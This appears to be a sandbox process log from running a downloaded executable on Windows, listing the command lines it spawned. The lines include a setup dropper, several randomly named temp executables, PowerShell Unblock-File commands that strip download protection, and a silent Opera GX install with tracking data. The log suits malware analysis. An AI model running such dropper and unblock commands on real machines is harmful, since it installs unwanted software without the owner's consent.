"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4576 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4476 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7072 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=6096 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2848 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6256 /prefetch:2

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe

"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=4248 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,2911207103318577068,16792507121962570219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1

C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe

"C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe"

C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7H7JR.tmp\is-D5VUR.tmp" /SL4 $305FA "C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8\the-longing-codex_m4vY1NvSZ8.exe" 6384938 52224

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "bom_mix_pro_11151"

C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe

"C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe" e6bb0bd45a3f81f477172f8405ad4523

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1732

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2152

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"

C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe

C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe /sid=3 /pid=224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2256

C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe

C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2248

C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp" /SL5="$40710,5432480,721408,C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2232

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause player_blu_ray_11143

C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe

"C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe" -i

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2404 -ip 2404

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause player_blu_ray_11143

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2248

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1456

C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe

C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe --silent --allusers=0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2268

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --silent --allusers=0 --server-tracking-blob=MzQ1OTdjOTNlMjc4YzMxYTlhNjYxNDg2NDVjYjkzMjI4YTJmM2RkYjg3ODE5YzdiYjJhN2Y5MzQyOWI5ODlkNjp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOiJvcGVyYV9neCIsInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yLz91dG1fc291cmNlPU9GVCZ1dG1fbWVkaXVtPXBiJnV0bV9jYW1wYWlnbj1vZ3gmJnV0bV9jb250ZW50PTM1MzE4IiwidGltZXN0YW1wIjoiMTczMTY0MjkxNC4yNDgwIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib2d4IiwiY29udGVudCI6IjM1MzE4IiwibWVkaXVtIjoicGIiLCJzb3VyY2UiOiJPRlQifSwidXVpZCI6IjQwZTg2MDRkLWE0NDAtNDhkZS1iMTNmLTY0OTUzMmFlMTZiMiJ9

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2300

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x70318c5c,0x70318c68,0x70318c74

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=2684 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20241115035520" --session-guid=aa2003d6-e906-4b9e-ae4d-56e7addc7336 --server-tracking-blob=YjZkOWQwMWM1ZGMyMWFkYWUyOTg1MGJlYzk0M2UzNTE0NTFiNmY4MDc2NjgzMzRkOWQ4YWY5YjEzZjg3Zjk2MDp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOnsibmFtZSI6Im9wZXJhX2d4In0sInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yLz91dG1fc291cmNlPU9GVCZ1dG1fbWVkaXVtPXBiJnV0bV9jYW1wYWlnbj1vZ3gmJnV0bV9jb250ZW50PTM1MzE4Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMxNjQyOTE0LjI0ODAiLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTE4LjAuMC4wIFNhZmFyaS81MzcuMzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiJvZ3giLCJjb250ZW50IjoiMzUzMTgiLCJtZWRpdW0iOiJwYiIsInNvdXJjZSI6Ik9GVCJ9LCJ1dWlkIjoiNDBlODYwNGQtYTQ0MC00OGRlLWIxM2YtNjQ5NTMyYWUxNmIyIn0= --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=DC05000000000000

C:\Windows\SysWOW64\WerFault.exe

